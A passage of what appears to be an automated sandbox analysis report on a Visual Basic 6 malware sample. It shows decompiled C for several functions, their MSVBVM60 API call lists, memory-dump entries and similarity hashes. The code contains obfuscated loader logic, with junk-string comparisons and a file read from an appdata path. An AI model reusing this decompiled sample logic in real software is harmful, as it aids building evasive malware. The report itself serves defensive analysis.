      • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041F6CD
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F6DC
      • __vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F6E9
      • __vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F6EF
      • __vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F6F9
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F73D
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F745
      • __vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F74D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
      • String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
      • API String ID: 1362175604-1043247457
      • Opcode ID: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
      • Instruction ID: e41becb712d6e9f7191228b7bf20ac305e8668c1b385e923c000365d7138cc6e
      • Opcode Fuzzy Hash: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
      • Instruction Fuzzy Hash: C981E972D00218AADB10EB91CD45FDEB7B9BF04304F5085AAE105B71A1EB785B89CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F770, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON
      Download Yara Rule
      C-Code - Quality: 46%
      			E0041F770(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v100;
				char _v108;
				char* _v116;
				char _v124;
				short _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _t69;
				signed int _t73;
				short _t77;
				char* _t82;
				intOrPtr _t111;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401540();
				_v12 = _t111;
				_v8 = 0x4013b0;
				if( *0x4223c0 != 0) {
					_v164 = 0x4223c0;
				} else {
					_push(0x4223c0);
					_push(0x4025a0);
					L004017CE();
					_v164 = 0x4223c0;
				}
				_v144 =  *_v164;
				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
				asm("fclex");
				_v148 = _t69;
				if(_v148 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x402590);
					_push(_v144);
					_push(_v148);
					L004017C8();
					_v168 = _t69;
				}
				_v152 = _v44;
				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
				asm("fclex");
				_v156 = _t73;
				if(_v156 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402ecc);
					_push(_v152);
					_push(_v156);
					L004017C8();
					_v172 = _t73;
				}
				L004017C2();
				_push(0x3139);
				L0040169C();
				L0040183A();
				_push(0x64);
				_push(_v32);
				L00401750();
				L0040183A();
				_push(_t73);
				_push(L"Sciuroid8");
				L0040172C();
				asm("sbb eax, eax");
				_v144 =  ~( ~( ~_t73));
				L00401846();
				_t77 = _v144;
				if(_t77 != 0) {
					_v100 = L"appdata";
					_v108 = 8;
					L0040184C();
					_push( &_v60);
					_push( &_v76);
					L0040171A();
					_v116 = L"\\qc17";
					_v124 = 8;
					_push( &_v76);
					_push( &_v124);
					_t82 =  &_v92;
					_push(_t82);
					L00401720();
					_push(_t82);
					L00401834();
					L0040183A();
					_push(_t82);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v24);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0x59);
					_push( &_v60);
					L00401708();
					_t77 =  &_v60;
					_push(_t77);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"Rutiner");
				L004017EC();
				_v28 = _t77;
				_push(0x41f9ec);
				L00401846();
				L00401846();
				L00401846();
				return _t77;
			}






























      0x0041f775
      0x0041f780
      0x0041f781
      0x0041f78d
      0x0041f795
      0x0041f798
      0x0041f7a6
      0x0041f7c3
      0x0041f7a8
      0x0041f7a8
      0x0041f7ad
      0x0041f7b2
      0x0041f7b7
      0x0041f7b7
      0x0041f7d5
      0x0041f7ed
      0x0041f7f0
      0x0041f7f2
      0x0041f7ff
      0x0041f821
      0x0041f801
      0x0041f801
      0x0041f803
      0x0041f808
      0x0041f80e
      0x0041f814
      0x0041f819
      0x0041f819
      0x0041f82b
      0x0041f83f
      0x0041f842
      0x0041f844
      0x0041f851
      0x0041f873
      0x0041f853
      0x0041f853
      0x0041f855
      0x0041f85a
      0x0041f860
      0x0041f866
      0x0041f86b
      0x0041f86b
      0x0041f87d
      0x0041f882
      0x0041f887
      0x0041f891
      0x0041f896
      0x0041f898
      0x0041f89b
      0x0041f8a5
      0x0041f8aa
      0x0041f8ab
      0x0041f8b0
      0x0041f8b7
      0x0041f8bd
      0x0041f8c7
      0x0041f8cc
      0x0041f8d5
      0x0041f8db
      0x0041f8e2
      0x0041f8ef
      0x0041f8f7
      0x0041f8fb
      0x0041f8fc
      0x0041f901
      0x0041f908
      0x0041f912
      0x0041f916
      0x0041f917
      0x0041f91a
      0x0041f91b
      0x0041f920
      0x0041f921
      0x0041f92b
      0x0041f930
      0x0041f931
      0x0041f933
      0x0041f935
      0x0041f93a
      0x0041f942
      0x0041f94a
      0x0041f94e
      0x0041f952
      0x0041f953
      0x0041f955
      0x0041f95d
      0x0041f962
      0x0041f963
      0x0041f965
      0x0041f96a
      0x0041f96c
      0x0041f971
      0x0041f976
      0x0041f977
      0x0041f97c
      0x0041f97f
      0x0041f980
      0x0041f98a
      0x0041f992
      0x0041f992
      0x0041f997
      0x0041f99c
      0x0041f9a1
      0x0041f9a5
      0x0041f9d6
      0x0041f9de
      0x0041f9e6
      0x0041f9eb

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F78D
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 0041F7B2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 0041F814
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 0041F866
      • __vbaFreeObj.MSVBVM60 ref: 0041F87D
      • #697.MSVBVM60(00003139), ref: 0041F887
      • __vbaStrMove.MSVBVM60(00003139), ref: 0041F891
      • #618.MSVBVM60(?,00000064,00003139), ref: 0041F89B
      • __vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041F8A5
      • __vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8B0
      • __vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8C7
      • __vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8EF
      • #666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8FC
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F91B
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F921
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F92B
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F93A
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F942
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041F955
      • __vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041F965
      • __vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041F96C
      • #526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041F977
      • __vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F980
      • __vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F98A
      • __vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F992
      • #696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F99C
      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9D6
      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9DE
      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9E6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
      • String ID: Rutiner$Sciuroid8$\qc17$appdata
      • API String ID: 862176544-1118470403
      • Opcode ID: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
      • Instruction ID: 7c428f09ce7703e27237ff70277566373f65784c74b6a6c4de62ce841f798d38
      • Opcode Fuzzy Hash: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
      • Instruction Fuzzy Hash: C5510C71900218AEDB10EBA1CC46FDEB7B8AF04708F50417AF105B71E1DB785A89CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E93A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON
      Download Yara Rule
      C-Code - Quality: 63%
      			E0041E93A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				short _v40;
				char _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				void* _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t86;
				char* _t87;
				signed int _t91;
				signed int _t98;
				short _t102;
				signed int _t108;
				signed int _t113;
				void* _t134;
				void* _t136;
				intOrPtr _t137;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L00401540();
				_v16 = _t137;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
				L00401708();
				_t86 =  &_v44;
				L00401858();
				L004016D8();
				L0040183A();
				L00401846();
				L00401828();
				L00401792();
				_t87 =  &_v48;
				L00401798();
				_v108 = _t87;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402650);
					_push(_v108);
					_push(_v112);
					L004017C8();
					_v132 = _t91;
				}
				_v56 = _v104;
				_v64 = 3;
				_push( &_v64);
				_push( &_v80);
				L00401678();
				_push( &_v80);
				L00401834();
				L0040183A();
				L004017C2();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401840();
				_v56 = 0x7042c;
				_v64 = 3;
				_t98 =  &_v64;
				_push(_t98);
				L004017E6();
				L0040183A();
				_push(_t98);
				_push(L"INVALIDNESS");
				L0040172C();
				asm("sbb eax, eax");
				_v108 =  ~( ~_t98 + 1);
				L00401846();
				L00401828();
				_t102 = _v108;
				if(_t102 != 0) {
					L00401672();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v136 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v136 = 0x4223c0;
					}
					_v108 =  *_v136;
					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
					asm("fclex");
					_v112 = _t108;
					if(_v112 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v108);
						_push(_v112);
						L004017C8();
						_v140 = _t108;
					}
					_v116 = _v48;
					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
					asm("fclex");
					_v120 = _t113;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x4025b0);
						_push(_v116);
						_push(_v120);
						L004017C8();
						_v144 = _t113;
					}
					_t102 = _v100;
					_v40 = _t102;
					L004017C2();
				}
				_push(0x41ebbd);
				L00401846();
				L00401846();
				L00401846();
				return _t102;
			}



































      0x0041e93d
      0x0041e94c
      0x0041e956
      0x0041e95e
      0x0041e961
      0x0041e968
      0x0041e977
      0x0041e983
      0x0041e992
      0x0041e996
      0x0041e9a6
      0x0041e9b0
      0x0041e9b8
      0x0041e9c0
      0x0041e9c5
      0x0041e9cb
      0x0041e9cf
      0x0041e9d4
      0x0041e9e3
      0x0041e9e6
      0x0041e9e8
      0x0041e9ef
      0x0041ea08
      0x0041e9f1
      0x0041e9f1
      0x0041e9f3
      0x0041e9f8
      0x0041e9fb
      0x0041e9fe
      0x0041ea03
      0x0041ea03
      0x0041ea0f
      0x0041ea12
      0x0041ea1c
      0x0041ea20
      0x0041ea21
      0x0041ea29
      0x0041ea2a
      0x0041ea34
      0x0041ea3c
      0x0041ea44
      0x0041ea48
      0x0041ea49
      0x0041ea4b
      0x0041ea53
      0x0041ea5a
      0x0041ea61
      0x0041ea64
      0x0041ea65
      0x0041ea6f
      0x0041ea74
      0x0041ea75
      0x0041ea7a
      0x0041ea81
      0x0041ea86
      0x0041ea8d
      0x0041ea95
      0x0041ea9a
      0x0041eaa0
      0x0041eaa6
      0x0041eab0
      0x0041eabc
      0x0041ead9
      0x0041eabe
      0x0041eabe
      0x0041eac3
      0x0041eac8
      0x0041eacd
      0x0041eacd
      0x0041eaeb
      0x0041eafa
      0x0041eafd
      0x0041eaff
      0x0041eb06
      0x0041eb22
      0x0041eb08
      0x0041eb08
      0x0041eb0a
      0x0041eb0f
      0x0041eb12
      0x0041eb15
      0x0041eb1a
      0x0041eb1a
      0x0041eb2c
      0x0041eb3b
      0x0041eb3e
      0x0041eb40
      0x0041eb47
      0x0041eb63
      0x0041eb49
      0x0041eb49
      0x0041eb4b
      0x0041eb50
      0x0041eb53
      0x0041eb56
      0x0041eb5b
      0x0041eb5b
      0x0041eb6a
      0x0041eb6e
      0x0041eb75
      0x0041eb75
      0x0041eb7a
      0x0041eba7
      0x0041ebaf
      0x0041ebb7
      0x0041ebbc

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E956
      • #526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041E983
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E996
      • #712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9A6
      • __vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B0
      • __vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B8
      • __vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C0
      • #685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C5
      • __vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041E9CF
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041E9FE
      • #613.MSVBVM60(?,00000003), ref: 0041EA21
      • __vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EA2A
      • __vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EA34
      • __vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EA3C
      • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EA4B
      • #574.MSVBVM60(00000003), ref: 0041EA65
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041EA6F
      • __vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA7A
      • __vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA8D
      • __vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA95
      • #611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAA6
      • __vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAB0
      • __vbaNew2.MSVBVM60(004025A0,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EAC8
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041EB15
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB56
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB75
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBA7
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBAF
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBB7
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
      • String ID: Flimflam$Fribords2$INVALIDNESS
      • API String ID: 2258197736-3412120936
      • Opcode ID: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
      • Instruction ID: 355c1c2ac91816339976770618c11783678ba40fc02f8777b14d40bb2027be04
      • Opcode Fuzzy Hash: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
      • Instruction Fuzzy Hash: 05710875D00218AFDB00EBA6C885BDDBBB8BF08704F50812AF505BB1E1DB786A45CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041EDE4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON
      Download Yara Rule
      C-Code - Quality: 61%
      			E0041EDE4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char* _v92;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t110;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t130;
				char* _t133;
				signed int _t136;
				intOrPtr _t168;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				L00401540();
				_v12 = _t168;
				_v8 = 0x401368;
				L004017B6();
				L004017B6();
				L004017B6();
				_v92 =  &_v44;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L0040181C();
				_v108 = L"ICHTHYOPOLISM";
				_v116 = 0x8008;
				_push( &_v68);
				_t110 =  &_v116;
				_push(_t110);
				L00401660();
				_v120 = _t110;
				L00401828();
				if(_v120 != 0) {
					if( *0x4223c0 != 0) {
						_v144 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v144 = 0x4223c0;
					}
					_v120 =  *_v144;
					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t118;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v148 = _t118;
					}
					_v128 = _v52;
					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
					asm("fclex");
					_v132 = _t123;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x4025b0);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v152 = _t123;
					}
					_v140 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040183A();
					L004017C2();
					if( *0x4223c0 != 0) {
						_v156 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v156 = 0x4223c0;
					}
					_v120 =  *_v156;
					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t130;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v160 = _t130;
					}
					_v128 = _v52;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v60 = 0x92ac1b00;
					_v56 = 0x5af5;
					_v68 = 6;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  &_v68;
					L0040165A();
					L0040183A();
					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
					asm("fclex");
					_v132 = _t136;
					if(_v132 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025b0);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v164 = _t136;
					}
					L00401846();
					L004017C2();
					L00401828();
				}
				_v60 = 0x607e9f;
				_v68 = 3;
				_t112 =  &_v68;
				_push(_t112);
				L0040166C();
				L0040183A();
				L00401828();
				_v24 = 0x5b2ec5;
				_push(0x41f103);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t112;
			}







































      0x0041ede9
      0x0041edf4
      0x0041edf5
      0x0041ee01
      0x0041ee09
      0x0041ee0c
      0x0041ee19
      0x0041ee24
      0x0041ee31
      0x0041ee39
      0x0041ee3c
      0x0041ee46
      0x0041ee4a
      0x0041ee4b
      0x0041ee50
      0x0041ee57
      0x0041ee61
      0x0041ee62
      0x0041ee65
      0x0041ee66
      0x0041ee6b
      0x0041ee72
      0x0041ee7d
      0x0041ee8a
      0x0041eea7
      0x0041ee8c
      0x0041ee8c
      0x0041ee91
      0x0041ee96
      0x0041ee9b
      0x0041ee9b
      0x0041eeb9
      0x0041eec8
      0x0041eecb
      0x0041eecd
      0x0041eed4
      0x0041eef0
      0x0041eed6
      0x0041eed6
      0x0041eed8
      0x0041eedd
      0x0041eee0
      0x0041eee3
      0x0041eee8
      0x0041eee8
      0x0041eefa
      0x0041ef09
      0x0041ef0f
      0x0041ef11
      0x0041ef18
      0x0041ef37
      0x0041ef1a
      0x0041ef1a
      0x0041ef1f
      0x0041ef24
      0x0041ef27
      0x0041ef2a
      0x0041ef2f
      0x0041ef2f
      0x0041ef41
      0x0041ef47
      0x0041ef54
      0x0041ef5c
      0x0041ef68
      0x0041ef85
      0x0041ef6a
      0x0041ef6a
      0x0041ef6f
      0x0041ef74
      0x0041ef79
      0x0041ef79
      0x0041ef97
      0x0041efa6
      0x0041efa9
      0x0041efab
      0x0041efb2
      0x0041efce
      0x0041efb4
      0x0041efb4
      0x0041efb6
      0x0041efbb
      0x0041efbe
      0x0041efc1
      0x0041efc6
      0x0041efc6
      0x0041efd8
      0x0041efdb
      0x0041efe2
      0x0041efe9
      0x0041eff0
      0x0041eff7
      0x0041f001
      0x0041f00b
      0x0041f00c
      0x0041f00d
      0x0041f00e
      0x0041f017
      0x0041f01b
      0x0041f025
      0x0041f033
      0x0041f039
      0x0041f03b
      0x0041f042
      0x0041f061
      0x0041f044
      0x0041f044
      0x0041f049
      0x0041f04e
      0x0041f051
      0x0041f054
      0x0041f059
      0x0041f059
      0x0041f06b
      0x0041f073
      0x0041f07b
      0x0041f07b
      0x0041f080
      0x0041f087
      0x0041f08e
      0x0041f091
      0x0041f092
      0x0041f09c
      0x0041f0a4
      0x0041f0a9
      0x0041f0b0
      0x0041f0dd
      0x0041f0e5
      0x0041f0ed
      0x0041f0f5
      0x0041f0fd
      0x0041f102

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE01
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE19
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE24
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE31
      • #524.MSVBVM60(?,00004008), ref: 0041EE4B
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE66
      • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE72
      • __vbaNew2.MSVBVM60(004025A0,004223C0,00008008,?,?,?,?,00004008), ref: 0041EE96
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EEE3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF2A
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF54
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF5C
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF74
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041EFC1
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F001
      • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F01B
      • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F025
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F054
      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F06B
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F073
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F07B
      • #536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F092
      • __vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F09C
      • __vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F0A4
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0DD
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0E5
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0ED
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0F5
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0FD
      Strings
      Memory Dump Source
